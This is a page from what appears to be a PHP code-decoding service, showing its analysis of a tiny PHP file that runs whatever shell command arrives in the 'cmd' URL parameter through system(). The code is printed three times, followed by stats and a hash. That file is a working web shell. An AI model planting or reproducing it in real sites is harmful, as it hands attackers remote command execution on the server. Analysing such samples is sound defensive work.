Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if(isset($_GET['cmd'])){ $cmd=$_GET['cmd']; system($cmd); } ?>..

Decoded Output download

<?php
	if(isset($_GET['cmd'])){
		$cmd=$_GET['cmd'];
		system($cmd);
	}
?>

Did this file decode correctly?

Original Code

<?php
	if(isset($_GET['cmd'])){
		$cmd=$_GET['cmd'];
		system($cmd);
	}
?>

Function Calls

system 1

Variables

$cmd None

Stats

MD5 db2da55e2c98dfb5f0f31bfe1f6e2853
Eval Count 0
Decode Time 91 ms